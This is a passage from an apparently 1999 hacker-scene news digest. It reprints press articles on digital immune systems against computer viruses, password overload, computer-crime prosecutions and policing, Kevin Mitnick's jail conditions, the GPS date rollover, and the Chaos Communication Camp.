"There used to be plenty of time to analyze a virus before it spread, but Internet-borne viruses can spread around the world in
hours or days," says Steve R. White of IBM's Thomas J. Watson Research Center in Yorktown Heights, N.Y. "In a world
where things can travel this quickly and do this much damage, we have to have automated ways of dealing with them. It is
silly to think that we can protect against these viruses manually."
Computer viruses got their name from what White calls "an obvious but deep biological analogy." Like biological viruses, the computer versions replicate by attaching
themselves to a host (a computer program rather than a human cell) and then co-opting the host's resources to make copies of themselves. Infection can lead to death:
The computer crashes and all program information is irretrievably lost. Infection can also lead to sickness when the virus does not destroy any data but spreads and slows
programs and communications. Even seemingly innocuous viruses may taint files and make the computer more likely to crash�like a long-lasting, low-grade infection.
Companies spend several hundred million dollars annually on antivirus products and services, and they lose even more in downtime when they need to take their systems
off-line to prevent viral infections from spreading.
Because antivirus programs can only identify the viruses they already know, they aren't effective against the 10 to 15 new viruses created every day. Worst of all, says
White, "many users of antivirus software blissfully continue to use antivirus software that is more than a year out of date."
Aside from frequent updates, there are few ways of strengthening this system. Some antivirus programs can monitor a computer system for viruslike behavior, such as
making a file bigger without adding new data, but such systems are prone to false alarms and virus makers can take steps to evade such detection systems.
In the early 1990s, White and his colleagues at IBM dreamed of a digital immune system for computers (SN: 7/23/94, p. 63). For a model, they looked to the human
immune system, which is constantly bombarded by infectious agents it has never before encountered and yet to which it generally responds quickly.
Computer virus makers often reuse key parts of existing viruses in their new creations, White explains. An immune system should be able to identify previously
unrecognized viruses by these short so-called genes, which often are critical to the viruses' function. Although conventional software might contain some of these genelike
sequences, the presence of many is typically a sign of viral infection, White says.
When a computer participating in a pilot test of this digital immune system finds virus genes or any other signs of infection, it strips out confidential data and encrypts the
rest. The altered file then goes to a central computer facility at IBM to be analyzed. A computer there routes the virus to a test machine that lures the virus into replicating
by running a variety of programs. If any of these decoy programs become infected, the test computer attempts to pull out a signature that can identify the virus in other
computers.
The signature and a prescription to strip the virus out of infected files is then sent back to the central computer. It adds the new virus to its database and sends the
information on detection and treatment back to the infected computer. IBM's automated process typically takes less than 5 minutes to identify a virus signature and derive
a prescription, the developers claim.
Uninfected computers will also be "vaccinated," as the IBM team puts it, against infections with this new virus as soon as they check the updated database. Ultimately,
White envisions, uninfected computers will be vaccinated automatically.
Later this summer, IBM, in conjunction with a leading antivirus-program developer, Symantec Corp. in Cupertino, Calif., plans to release an antivirus plan that includes such
a digital immune system. "This is the first step toward a comprehensive system that can spread a global cure for a virus faster than the virus itself can spread," White
says.
The IBM researchers are still trying to develop ways to mimic another trait of the immune system. An infected cell produces chemicals signaling distress, warning neighbor
cells to put up barriers to slow the spread of the virus. Thus, when the immune system develops ways of attacking the intruder, it can quickly outpace the spread of the
virus.
The biological analogies of computer security may stretch even further than IBM's vision, says Stephanie Forrest of the University of New Mexico in Albuquerque. The
human immune system identifies foreign invaders because they don't carry the body's typical flags of "self," not because they resemble other infectious agents. Forrest and
her colleagues have found a way for a computer to identify self.
By looking at short sequences of signals between a program and the computer's operating system, she and her colleagues have defined patterns unique to each machine.
Abnormal patterns may be a sign of infection. For example, a program making unusual demands on system resources has very likely been co-opted by a virus or is being
attacked by a hacker, says Forrest.
"We've shown pretty convincingly that looking at these short sequences of self gives good discrimination between what is self and what isn't," she says. Such a system
can be very efficient, Forrest points out. The protected computer uses its resources to check only programs and files that it is using.
She and her colleagues have also shown that information packets flowing into and out of a network of computers hooked to the Internet show patterns recognizable as self
or nonself.
Like white blood cells in the human body, a digital immune system can create antibodies that recognize foreign material, Forrest says. To minimize the chances that the
antivirus program will attack the computer itself, it would always destroy antibodies that flag patterns that are intrinsic to the computer. Using the remaining digital
antibodies, the system will periodically check for abnormal patterns that may signify virus infections or intrusions from hackers.
Forrest and her colleagues are working on a system that will allow a computer to continually learn to redefine itself, so the computer can accept new programs without
flagging them as viruses. The researchers have not yet explored how to attack viruses once identified.
Forrest says that a self-recognizing system will be practical even for individual computers connected to the Internet and used primarily for E-mail, writing, designing graphic
presentations, and perhaps a little programming.
Though still theoretical, Forrest's approach may offer many advantages. A different immune system would run on every computer. Since every computer would create
different antibodies, a virus that evaded one computer might not escape detection by another, limiting the spread of the virus. Likewise, a person who broke into one
computer network and managed to avoid detection by that system might not be so successful on another network, she says.
"They've taken a much more exact analogy with biology by developing digital antibodies," says White. "But the analogy breaks down. All of my cells come from me, so my
immune system can define self. But I put files on my computer every day.... This system may be very good for intrusion detection, but it may not be a good approach for
viruses, because it will make too many mistakes. Our approach is more specific for viruses."
Both research groups caution that in nature, no defense system remains perfect forever. Just as white blood cells and viruses engage in a delicate dance, each evolving to
outwit the other, so will computer viruses and antivirus technology, White says.
Viruses are getting more dangerous all the time, he says. Several programs for automating the development of macro viruses are circulating, meaning that the virus-writing
community can create viruses faster than ever.
There are even some indications that viruses may be evolving on their own, White says. For example, some versions of Microsoft Word may make minor errors when
copying viruses. These changes may disable the virus, or they may make the virus harder to spot. Also, if two or more viruses successfully infect a computer, one may
accidentally copy itself into the other virus, creating a new kind of bug, he says. While uncommon so far, these scenarios are certainly threatening, White notes.
Whatever the form of the threat, the goal of protecting computer systems remains. "What we would ideally like is for a computer to behave the way the human body does,"
says Sushil Jajodia of George Mason University in Fairfax, Va. "When we are attacked by a virus, we get sick, but the immune system detects the virus, defeats it, and
heals the damage. Computer systems are not like the human body, though, in that we need to provide the technology."
Because programs and operating systems are not usually designed with security in mind, antiviral programs will always be behind the curve, says Jajodia. "It still isn't clear
how well this idea [of digital immune systems] will work, but we have no better alternative for detecting virus infections," he says.
Computer users have demanded ease of use but not security, says Forrest. "While people are becoming aware of the issues...they don't feel personally threatened yet."
She notes that "when the Internet took off in the early '90s, it became evident that the computer-security problem was going to become everybody's problem."
Jajodia, editor-in-chief of the Journal of Computer Security, says that programmers should address the problem of viruses long before people begin using newly developed
software.
Designing computer systems and programs with security in mind is an important first step, he says. More programs should check digital signatures to confirm that
transferred files and computer code come from a trusted source. Better encryption systems, which help ensure that information has not been altered in transit from one
computer to another, would make it harder for people to design viruses and for viruses to spread, he says.
Computer-security experts warn that no single set of changes will be enough to completely protect increasingly interconnected computer systems. They hope, however,
that new security measures, such as digital immune systems, will fend off future epidemics.
Computer viruses: Then and now
The first computer virus, called Brain, appeared in 1987. The people who created the first viruses hitched them to operating systems (such as DOS) or to applications (such
as games or editing programs). Some of these viruses are still circulating. With these viruses, when a user turns on an infected computer or runs an infected program, the
viral code copies itself into the computer's memory�and from there into any subsequent applications the user runs. These viruses spread only when a computer user
shares tainted files and programs with other people.
On the other hand, viruses like Melissa latch onto macros, small programs hidden in word processing software. For example, when an unsuspecting recipient of the
Melissa virus opened an infected document written in Microsoft Word, the virus activated and hijacked another program known as Microsoft Outlook. This program E-mailed
copies of the infected document to the first 50 people listed in the program's address directory. The virus spread so quickly because so many people use both Word and
Outlook.
Until macros became commonplace, viruses couldn't infect data files, including word processing documents and spreadsheets. Macro viruses proliferate rapidly because
many people share data files freely, and they do so primarily through E-mail. Once one data file is infected, a virus can infect all other data files of that application as soon
as they are opened.
By the end of 1998, programmers and users had identified more than 30,000 viruses. Viruses of all sorts now affect millions of computers every year.
From Science News, Vol. 156, No. 5, July 31, 1999, p. 76. Copyright � 1999, Science Service.
@HWA
46.0 Forgot your password? Try 'way2many'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.nytimes.com/library/tech/99/08/circuits/articles/05pass.html
August 5, 1999
Forgot a Password? Try 'Way2Many'
Better Online Security Has Meant More Passwords, and
More Frustrated Users
By JENNIFER 8. LEE
few months ago, Kevin McGuire, a computer consultant in
Lombard, Ill., designed a new computer system for a client. After
a break from the project, he sat down at the computer to start up the
system but couldn't get into the server. He had forgotten his password.
A sense of panic
gripped him as he
rapidly typed in
variations on his
favorite passwords.
Two days later he
gave up and rebuilt
the system from
scratch.
Not everything can
be recreated,
though. Also lost in
password purgatory
is a year's worth of personal journal entries he kept in a Microsoft Word
document on his personal computer.
"I wanted the password to be different so that people wouldn't be able to
get to my journal," McGuire said. "Unfortunately, neither can I."
It is understandable that McGuire would drop a password or two. On a
regular basis, he must remember three dozen passwords to gain access
to computer networks, software programs, e-mail, voice mail, fax mail,
Web sites, ATM's and even the security system for his house.
Forgotten passwords are an inevitable consequence of the digitization of
everything from money to mail. Twenty years ago, people had to
remember only their Social Security number and maybe a phone number
or two. But since the introduction of the automated teller machine, people
have accumulated an arsenal of passwords, access codes and personal
identification numbers to use everything from answering machines to
office bathrooms. A result is lost computer files, inaccessible accounts
and a lot of banged-up keyboards.
"What is nightmarish is that we rely so much on information that comes
from different sources," said Alessandro Piol, a managing director of
Investco Private Capital in New York, who has been locked out of his
e-mail account while conducting coast-to-coast venture capital
negotiations. "If you are locked out of a system, it's like losing a limb."
The exponential growth of Web sites creates an exponential growth in
forgotten passwords. Almost all password-protected sites either
encourage people who have forgotten their passwords to reregister or
provide a mechanism where they can automatically retrieve their
password. The New York Times on the Web site estimates that more
than 1,000 people forget their password to the site each week, and 10 to
15 percent of its registrants are duplicates.
Of course, many computer users simply do what computer security
experts warn them not to: use the same password for everything. But
even that strategy is becoming more difficult because various computer
systems have different requirements for the rendering and length of the
passwords.
Ron Dilley is an extreme example of the password problem. Dilley, a
network administrator for Applied Digital Access in the San Diego area,
maintains 129 active passwords, 37 personal ones and 92 for work.
He sees himself as the archetypal wired citizen of the future.
"I suspect that we will be totally inundated with passwords of one form
or another in the next 10 to 20 years and possessing 129 passwords will
be the norm," he said. Dilley began to use a Palm organizer to track his
passwords. Every few weeks, he forgets to take his Palm when he leaves
home and makes a 50-minute round-trip back home to pick it up.
Forgotten passwords cost millions of dollars annually in help-desk costs
and lost productivity -- incidents like McGuire's rebuilding of the
computer system from scratch. Industry estimates say 20 percent to 50
percent of all calls to company help desks are from people needing their
passwords reset. According to the Gartner Group, an organization with
2,500 desktop computers can spend more than $850,000 a year
resetting passwords.
The requests for password help "are considered to be noise and nuisance
by help-desk staff, because they are so highly repetitive," said John
Jacobs, president of Network Support Technologies, a company in
Burlington, Mass. that provides help-desk services.
Forgotten passwords are a product
of the computer's ability to store
more information than the human
brain can.
"In the old days you just had to yell
out, 'Zog, it's me,' and he would let
you into the cave without clubbing
you," said Prof. Irving Biederman, a
cognitive neuroscientist at the
University of Southern California.
"Now you need all these passwords
to get access anywhere."
Research confirms the intuitive: the
more we are asked to remember, the
more likely we are to forget. The
brain's capacity for remembering is
indefinite as long it has associations
for the memories.
"The design of human memory and the design of computer architecture is
at a crossroads," said Steve Pinker, a cognitive neuroscientist at the
Massachusetts Institute of Technology. "A computer password must be
arbitrary enough that people can't guess it, but human memory is
designed to remember things that are not arbitrary."
Whereas short-term memory usually holds between five and nine items,
scientists say there are no limits on long-term memory capacity -- as long
as people have associations for those memories.
That is why people have a natural impulse to choose passwords based
on familiar things -- children's birthdays, spouse's name, favorite sports
team -- rather than incomprehensible strings like 3B#$Ir or 7*$3fg.
According to Dr. Pinker, there is no neurological reason that given strong
enough associations, people shouldn't be able to recall 129 passwords,
"like you can remember an indefinite number of names of friends."
A nuisance for computer users is also a growing expense for companies.
The rampant growth of passwords has spawned
various strategies for handling scattered bits of
information. Some people keep lists of
passwords taped to walls or to the underside of
their keyboards, much to network
administrators' dismay. Others keep lists in small
notebooks or in files stored on their computers.
Some high-security institutions like financial companies and hospitals
assign passwords instead of letting users choose, or force users to
change their passwords every 30 or 60 days, which results in periodic
spikes in reset calls to technical support staffs.
Resetting of passwords has become so costly to companies that some
are choosing to automate the process. Password reset software
eliminates the need for harried users to depend on help desks by allowing
them to maintain their own user profiles. Merrill Lynch and Boeing both
recently purchased such systems from the Courion Corporation.
Michael J. Koszenski, a computer technician in Lexington, spent 2,000
hours of his own time creating a password database software for his PC
after being disappointed with various password tracking programs. "It
basically goes back to if you want something done right, you have to do it
yourself," said Koszenski, who has 30 or so passwords and access
codes to manage. For protecting his password program, there is yet
another password that he keeps in his head.
The proliferation of passwords and the propensity to lose them has
helped fuel a cottage industry of companies and consultants who recover
passwords using computer programs.
While most password recovery requests come from people who are
trying to retrieve passwords of dead relatives or disgruntled former
employees, recovery businesses estimate that between 15 percent and
25 percent of requests come from people who have forgotten their own
passwords on documents. Tax time is a popular time for people to forget
passwords, particularly those on old financial files. So, too, are the
holidays.
"For about a week after New Year's people call up saying, 'I got drunk
over the holidays, I changed my password on a whim and I can't
remember it,"' said Amber Schroader, general manager of Access Data
in Provo, Utah which sells about 600 password recovery software
packages a month.
Among the most common requests involve passwords for documents
created with Microsoft Word or Excel, which are easy for the companies
to recover because those programs do not have strong encryption. The
majority of popular software applications produced in the United States
and distributed internationally have intentionally weak encryption since
this country has strict controls on the export of encryption tools and
products, said Bob Weiss, president of Password Crackers, a
Web-based password recovery consulting firm. "People are surprised by
how many software products listed on our site are not secure," he said.
There are some emerging high-tech solutions to the password deluge.
Biometric devices that recognize fingerprints, faces and voices, and smart
cards that are embedded with computer chips are gaining in popularity.
Matchbox-size fingerprint recognition devices for the PC are now
available for as low as $99. So-called smart cards, which carry digital
signatures and are used for phone calls and purchases, are growing at a
rate of 30 percent a year, predominantly in Europe.
Piol, the venture capitalist, once taped a piece of paper listing his
passwords on the wall by his desk, but a few months ago he started using
a fingerprint scanner, U.are.U, to help manage the passwords. Impressed
by the device, Piol tore down the paper and led a $9 million dollar
venture capital investment in the company, Digital Persona.
But until fingerprint scanners and smart card readers become as standard
on desktops as computer mice, people will still have to struggle with the
chore of password management. The University of Michigan is teaching
its students a hygienic, low-tech approach to the problem. Treat
passwords like underwear, the university says: Never let friends borrow
them and never leave them lying about. And as anybody's mother would
say, change them often.
@HWA
47.0 A Former Network Administrator Faces Felony Charges in Hacker-Site Case
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://chronicle.com/cgi2-bin/printable.cgi
A Former Network Administrator Faces Felony Charges in Hacker-Site Case
By FLORENCE OLSEN
A 25-year-old former computer-network administrator for the University of Oklahoma
faces criminal charges under the state's Computer Crimes Act after allegedly
using the university network to operate a site for hackers.
which heavy use mysteriously disabled the campus network just as upperclassmen were
arriving for the fall term. Authorities are investigating whether others were
involved.
The heavy usage had the effect of reducing the capacity of the campus backbone from
"a 12-inch-diameter pipe to one no bigger than a stir straw," says Lieut.
Jeffrey Harp, a public-safety officer at the university.
At the time, university officials seized more than a half-dozen unauthorized Internet
servers operating in two rooms assigned to residence-hall advisers in Walker Center,
a 12-story dormitory on the university's campus, in Norman. The Daily Oklahoman reported
that Mr. Breding is suspected of operating a "warez" site (pronounced "wares"), where
members of the Internet underground copied and exchanged pirated commercial software after
hackers had cracked the files' copyright-protection codes.
Campus police say they seized one computer that the former network administrator allegedly
had set up for a commercial purpose -- serving as host for others' Web pages.
If convicted, Mr. Breding could be punished with up to a 10-year prison sentence and a fine
of as much as $100,000. A hearing is set for August 17.
University police spent 11 months and $20,000 on equipment, training, and consulting services
to investigate the incident before turning the case over to the district attorney's office.
"It was an eye-opening case for us," Mr. Harp says.
"It taught us that we needed to get up to speed on investigating computer crime," he says, and
in turn led department detectives to seek further training and certification as forensic computer
investigators. "It was our first case like this, and we're trying to prepare ourselves for the
next one."
Mr. Breding was charged under the state's Computer Crimes Act, passed in 1984 and updated several
times since. The act makes it a felony to knowingly or willfully exceed one's authorized use of
computer-network resources or to disrupt those services to others. Tera Duke, the assistant district
attorney, says it is the first such case filed under that statute in Cleveland County District Court,
in Norman.
Ms. Duke says she is unaware of any pending federal charges related to the case.
@HWA
48.0 Happy Birthday Kevin
~~~~~~~~~~~~~~~~~~~~
From http://www.antionline.com/s
Mitnick's Life - As It Stands Now
Monday, August 2, 1999 at 1:20:04
by Kimberly Tracey - Writing For AntiOnline
For a few years I was talking to Kevin almost every day and sometimes
several times a day. Right now my work prevents me from being in
touch with him every day, but I know people who are in contact with
him, so I stay current.
Here's a little bit about Kevin's life at MDC:
At MDC there is no yard for exercising. They have no place to exercise
outside where they can sit in the sun. Whenever the guards call a
"lockup," the inmates are rounded-up and taken to a very large balcony
outside. If you want to use a bathroom, you go to the one in your cell.
When Kevin was sleeping on the floor, he had to use the toilets of other
inmates.
There are two TV's on Kevin's floor. The last time I heard, one TV was
controlled by the blacks, and the other was controlled by the Hispanics.
These two groups decide what everyone will watch. A white Jewish
guy like Kevin doesn't have much of a say in the programming. There
are vending machines on the floors, and there is at least one microwave
oven. When the food is lousy, which is most of the time, inmates buy
food from the guards or from someone in the kitchen and prepare meals
and share them with each other. That is why Kevin accumulated cans
of tuna and Pepsi a couple of years ago because these items are very
important when you have nothing else to eat. And the tuna is that brown
low-grade smelly stuff that I hate....no white albacore tuna at MDC!
MDC brought in a couple of exercise bikes and they were broken
almost immediately. I'm not sure what Kevin uses to exercise now.
They may have gotten some new equipment. When he said he just
finished a "workout," that could have been pushups, situps, and lifting
some weights, if they have them. They might consider weights potential
weapons, I don't know.
Whenever any of us send Kevin money, it is put into his account and he
is given a receipt telling him the amount. And unless they have changed
the system, he doesn't know who sent him the money. And if you send
him a personal check or a money order from the bank, the money is held
up for weeks before it is placed into his account. If you send him a
money order which you can buy from the Post Office, that money is
placed into his account immediately. Therefore, if you are near the Post
Office and want to help Kevin, pickup a Postal Money Order and send it
to him with a note telling him that you included a MO for $10 or
whatever the amount was. Then regardless of whether MDC informs
him where the money came from, he will know directly from you what
was sent, and he will appreciate it very much.
Whatever money Kevin receives is spent on stamps, envelopes, paper,
shaving and bath items like soap and toothpaste, vitamins, tennis shoes,
plain white Hanes t-shirts, etc.
When Kevin makes calls, he goes to one of the three phones on the
floor and leans against the wall as he places his collect calls. He is only
allowed to call collect, and Pac Bell charges around $2.00 for every call
accepted by the party he is calling plus the minute rate. Each call is
limited to 20 minutes. The computerized operator breaks in at 19 minutes
and tells you that there is one minute remaining, and then 15 seconds
and you are cut off exactly at the 20 min point. If Kevin is lucky, he
finds a stool he can sit on while he is talking. Usually, each morning
inmates signup for phone time. If you have a few extra dollars, you are
able to buy someone's phone time. MDC doesn't like this practice, but
they all do it and most of the time the guards leave you alone. On this
floor where Kevin resides, phones are shut off at 9:45 p.m. They are
turned back on around 7 or 8 a.m.
During the day inmates roam around in one big "general area." Many
play cards. There is at least one ping-pong table because you can hear
the ball being hit back and forth in the background. Inmates can signup
for library time. Kevin is still being allowed to work on his computer
during the day, no weekends.
Kevin and others can buy cheap Sony Walkmans from the prison
commissary. They can play the radios, but they are not allowed CD or
tape players. Kevin's attorney, Donald Randolph, can bring these items
to the "attorney room" and Kevin can listen to tapes and view a video if
he is with his attorney. So don't send Kevin tapes or CD's unless you
send them directly to his attorney. And then they may never reach
Kevin because he is working on his case when his defense team visits
him.
Pretty grim, right? Your letters, cards, jokes, magazines, and different
items you send Kevin break the monotonous schedule he faces every
day. He may not have the time to write back to every person who
writes to him, but he reads everything and tells his friends and family
how much the news from the outside world means to him. And Kerry
and Emmanuel and the rest of the people who hear from Kevin will tell
you that he appreciates the support from this mailing list and those who
visit his site and inform the world about him and his case.
BTW:
Kevin's BirthDay is August 6th. If you would like to send him a card or
gift, you can mail it to:
Kevin Mitnick
89950-012
P.O. Box 1500
Los Angeles, CA 90053
@HWA
49.0 Cybercrime up 43%
~~~~~~~~~~~~~~~~~~
http://www.zdnet.com/filters/printerfriendly/0,6061,2310082-2,00.html
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Study: Cybercrime cases up 43 percent
By Kevin Poulsen, ZDNN
August 5, 1999 3:54 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2310082,00.html?chkpt=hpqs014
Federal law enforcement agencies referred a record number of computer crime cases for
prosecution last year, but most of them were rejected by government attorneys, according to a legal
journal report released Wednesday.
The report, authored by attorney and electronic privacy advocate David Banisar, and based on data
obtained under the Freedom of Information Act by the Transactional Records Access
Clearinghouse, appears in this week's Criminal Justice Weekly. It's believed to be the first
independent analysis of the government's war on computer crime.
In all, investigators from the FBI and other agencies offered 419 computer crime cases to federal
prosecutors in 1998, up 43 percent from 1997, and more than three times as many as in 1992. At the
same time, prosecutors filed charges in only 83 cases.
That ratio of referrals to prosecutions, approximately 5 to 1, is significantly lower than the overall
rate for federal prosecutions in all categories. In 1998, Banisar said, there were 132,772 referrals at
the federal level, and 82,071 prosecutions, or about one prosecution for every 1.6 referrals.
FBI: Hard to prove
"Computer crime is terribly hard to prove," says FBI spokesperson Debbie Weierman. "Every one is
handled on a case by case basis, and I can't give you a general reason for the difference in figures."
According to the report, each year between 1992 and 1998, the Department of
Justice has declined to prosecute between 64 percent and 78 percent of the
cases brought to them. Forty percent of the rejected cases cited lack of
evidence of criminal intent, weak or insufficient admissible evidence, or no
evident federal offense. Another 15 percent were referred to state authorities
for prosecution. The remaining cases may be outstanding, or reclassified under
another category.
A former assistant United States attorney said he is not surprised by the
results, and that in many ways computer crime cases are unique.
"There are serious evidentiary questions and jurisdictional questions in these
cases," says Mark Rasch, a former computer crime prosecutor, now working as a computer security
consultant for Global Integrity, based in Virginia. "Law enforcement may be presenting you with a
perfectly good case, against a defendant in Kuala Lumpur."
Moreover, he said, "Juveniles are frequently the ones that get caught. So while the FBI may be able
to put together a perfectly cohesive case against a juvenile, that's the kind of case that may be
declined by the United States Attorney's office by their discretion."
Unique challenges
Justice officials hadn't reviewed the statistics, but agreed that there are unique challenges to
prosecuting computer crime.
In 1998, the average sentence for those convicted was five months, with over half of the defendants
receiving no jail time. Since 1992, 196 people have been convicted and 84 imprisoned in cases
classified as federal computer crimes.
Only 57 cases reached disposition last year, 47 ending in convictions, primarily in plea agreements,
and 10 ending with the status of "not successful" -- a category that includes dismissals and not-guilty
verdicts.
Of the cases that ended in 1998, the FBI initiated the most, with 21 convictions, and eight
unsuccessful prosecutions. The Secret Service, Treasury Department and IRS claim the remaining
28 convictions and two failed prosecutions, says Banisar, a columnist for the legal journal, and
co-author of The Electronic Privacy Papers.
Because referrals can take years to become prosecutions, direct correlation from year to year is a
tricky matter, Banisar cautioned. But he said the overall statistics are telling.
"For an issue that the federal government is making such a major deal out of, trying to stop computer
crime and information warfare, there's remarkably few prosecutions," he said.
Kevin Poulsen writes a weekly column for ZDTV's CyberCrime.
@HWA
50.0 Canada Can't Keep Up With CyberCrime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
An intelligence brief prepared by the RCMP says that the
Canadian police lack the necessary skills and personnel
to protect the nations infrastructure from infocriminals
and cyber terrorists.
Ottawa Citizen
http://www.ottawacitizen.com/national/990805/2686261.html
Police can't handle cyber threats:
RCMP report
Mounties say Canada is 'lagging behind' in
creation of hacker-defence systems
Jim Bronskill
The Ottawa Citizen
The RCMP say Canadian police lack the necessary skills and personnel to
meet the growing threat to national security from computer hackers.
Canada is "lagging behind" other advanced countries in building defences to
protect communication, power, water and banking systems, warns an
intelligence brief prepared by the force in mid-June.
"There is a general lack of awareness about the nature and level of threat
posed to national security by cyber attacks and the level of defence and
response that would be required," says the brief, obtained under the Access to
Information Act.
"Several government departments dealing with an increasing number of
sophisticated attacks are seeking guidance, support and assistance from law
enforcement, only to find there is a lack of skilled and trained resources."
The assessment is the latest in a string of warnings sounded by Canadian
security agencies about the vulnerability of the country's information networks.
A special Senate committee and the Canadian Security Intelligence Service
have also underscored the threat to digital networks and data banks from
hackers, electronic spies and cyber-terrorists.
The RCMP noted an increase during the last year in the number of computer
breakins, data thefts and system disruptions, a trend that does not bode well.
"The likelihood of a serious, deliberate and targeted attack to a Canadian
critical-infrastructure system has increased from low to medium, and the
impact of such an attack remains high," says the RCMP brief. "In the last five
years, the capability to intrude into systems has increased dramatically as the
cost of technology has plummeted."
On the Internet, there are Web sites, electronic bulletin board services and
chat rooms dedicated to discussing and trading hacking tools and methods.
A group known as H4G1S claimed responsibility for breaking into and altering
13 major U.S. and Canadian corporate Web sites in April, notes the RCMP
document. A more serious attack could have the cascading effect of the
January 1998 ice storm that denied electrical power to parts of Eastern
Canada.
The brief's worrisome tone does not surprise Andrew Mackie, director of
Manitoba's fledgling information protection centre.
"We are way behind the other countries," he insisted.
Mr. Mackie said the United States, Australia, Britain and other European
countries have moved more quickly than Canada to set up national centres to
detect and prevent attacks.
"We don't even have a plan right now. We're just working on it."
RCMP Sgt. Andre Guertin said the force sees a rising threat to Canadian
systems in the immediate future because of the heightened potential for
sabotage due to the millennium computer bug.
The force has established Project Solstice to ensure governments and
businesses are aware that terrorists could take advantage of the computer
glitch.
For instance, a company might be tempted to waive security screening in the
rush to hire a repair crew to make systems Y2K compliant.
The RCMP have been assisting the U.S. Federal Bureau of Investigation on
computer-crime cases, but the memo notes "difficulties encountered with
Canadian collaboration and investigative support" in international probes,
raising issues of co-ordination, resources and sovereignty.
Mr. Guertin said some of these questions were broached when U.S. and
Canadian officials met in Charlottetown in June to discuss cross-border crime.
@HWA
51.0 Germans hold bank liable for using 56 bit encryption.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
A German court recently decided to hold a bank liable
for losses in connection with a stolen Eurocheque card
in part because the 56-bit encryption protecting the
card was considered "out-of-date and not safe enough."
Are you still relying on DES to keep your data secure?
Asian Technology Information Program - Paragraph 13
http://www.atip.or.jp/public/atip.reports.98/atip98.096.html
52.0 GPS Date Rollover on Aug 22
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by ph1b3r_m0nk
On Aug. 22nd the GPS (Global Positioning System)
Rollover is scheduled to occur. This rollover happens
every 1,024 weeks but this will be the first rollover since
the system went online on Jan. 6th 1980. On Aug. 22nd
the date counter will return to zero to begin the count
for the next 1,024 weeks. GPS is utilized within many
industries such as Satellite tracking, Defense
Information, Navigation and Geographic Information
Systems (GIS). Some early GPS units did not take this
date rollover into account and may be affected.
(hhhmmmm, I suppose we ought to postpone that
hiking trip.)
National Park Service
http://www.nps.gov/pub_aff/features/gps_alert.htm
Wired
http://www.wired.com/news/news/technology/story/21098.html
Navstar GPS Joint Program Office
http://gps.laafb.af.mil
53.0 NY Police Face Possible Copyright Violations
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Space Rogue
The New York State Police has turned to the web in an
effort to track down the alleged vandals who destroyed
the Woodstock '99 site. The Police posted 10
photographs of the mayhem that had been taken by the
Associated Press and asked the public to help identify
people in the photos. The AP requested the photos be
removed as soon as they knew about it.
Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,77278-122111-861061-0,00.html
Civic.com
http://www.civic.com/news/1999/august/civ-woodstock-8-4-99.html
New York State Police Web Site
http://www.troopers.state.ny.us/
New York police turn to Web for help in Woodstock crimes
Copyright � 1999 Nando Media
Copyright � 1999 Associated Press
By JOHN KEKIS
ROME, N.Y. (August 3, 1999 12:00 a.m. EDT http://www.nandotimes.com) - New York State Police are turning to the Internet in an attempt to track
down thieves and vandals who trashed the Woodstock '99 site. But their use of news photos without permission has raised other legal issues.
The State Police posted 14 photographs on its Web site, including 10 shot by Associated Press photographers. The AP protested as soon as it
learned of the unauthorized use.
The photos show concertgoers breaking into pay phones, tearing down a 3-mile-long "Peace Wall," looting a vendor's truck and robbing an
automated teller machine. The police ask the public for any additional photos and details of the identities of people shown.
Sam Boyle, chief of the AP's New York City Bureau, discussed the site with various officials on Monday.
"We have two concerns - violation of copyright and the journalistic separation from law enforcement," Boyle said.
The AP photos were put on the state police Web page on Friday, according to M.J. Edelman, Web master for the state police. Monday morning, Lt.
Jamie Mills of the public information office said the pictures would be taken off the site.
Boyle then received calls from higher officials asking for permission to keep the pictures up, which he said could not be granted.
Glenn Valle, chief counsel for the state police, said his review indicated that there may not be an issue of copyright infringement.
"We don't think that we're violating the copyright or infringing on the copyright in this manner," Valle said. "It was material that was already
published."
@HWA
54.0 Chaos Computer Club: Happy Hacker Campers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Geekstock: German Hackfest
~~~~~~~~~~~~~~~~~~~~~~~~~~
Wired News Report
3:00 a.m. 30.Jul.99.PDT
It's Internet World meets the Rainbow Gathering next week when geeks from around the world gather for a three-day camp out near Berlin.
Sponsored by German hacker group Chaos Computer Club (CCC), the event pits campers against each other in periodic hacking contests and gives
proto-geeks a chance to see the light of day.
Pre-registration is already closed for the event, which will take place 6 to 8 August in Altlandsberg, near Berlin. However, according to the CCC site,
those who want to show up at the event with DM150 (US$82) may slip under the 2,000-people limit.
The camp will be divided into theme villages, Burning Man style. Participants can choose the village that most represents their talents and interests,
from lock-picking to re-engineering to cryptography. Intermittent events like the Linux Deathmatch, a competition in which one team tries to hack
another's network, will liven up bouts of partying, workshopping, and drinking at the CCC Leisure Lounge, and swimming on the nearby lake.
The CCC will provide electricity and an Ethernet for every tent. Campers are encouraged to bring their own computer equipment and can hook up to
the specially created CAMPnet network or the Internet in their tents or in the CCC hackcenter.
The grassroots event discourages press and commercial attendance. Business visitors -- defined in the FAQ as those who are "rich or working for a
company or government that wants you at the Camp because there is a lot to learn or you have a certain commercial interest" -- are asked to pay
an increased ticket price of DM1,500 (US$800).
Hackers Happy Campers
~~~~~~~~~~~~~~~~~~~~~
by Steve Kettmann
3:00 a.m. 7.Aug.99.PDT
BERLIN -- It takes countless hours cooped up indoors in front of a computer screen to truly appreciate the giddy mood at this weekend's three-day
Chaos Communication Camp.
By Friday evening, more than 1,400 hackers, encryptologists, computer visionaries, and assorted geeks had pitched their tents in a scenic lakeside
field, and more were on their way.
An afternoon of workshops gave way to a warm evening of lounging in front of tents, as people pounded away at keyboards and greeted
acquaintances they had met only via networks or email.
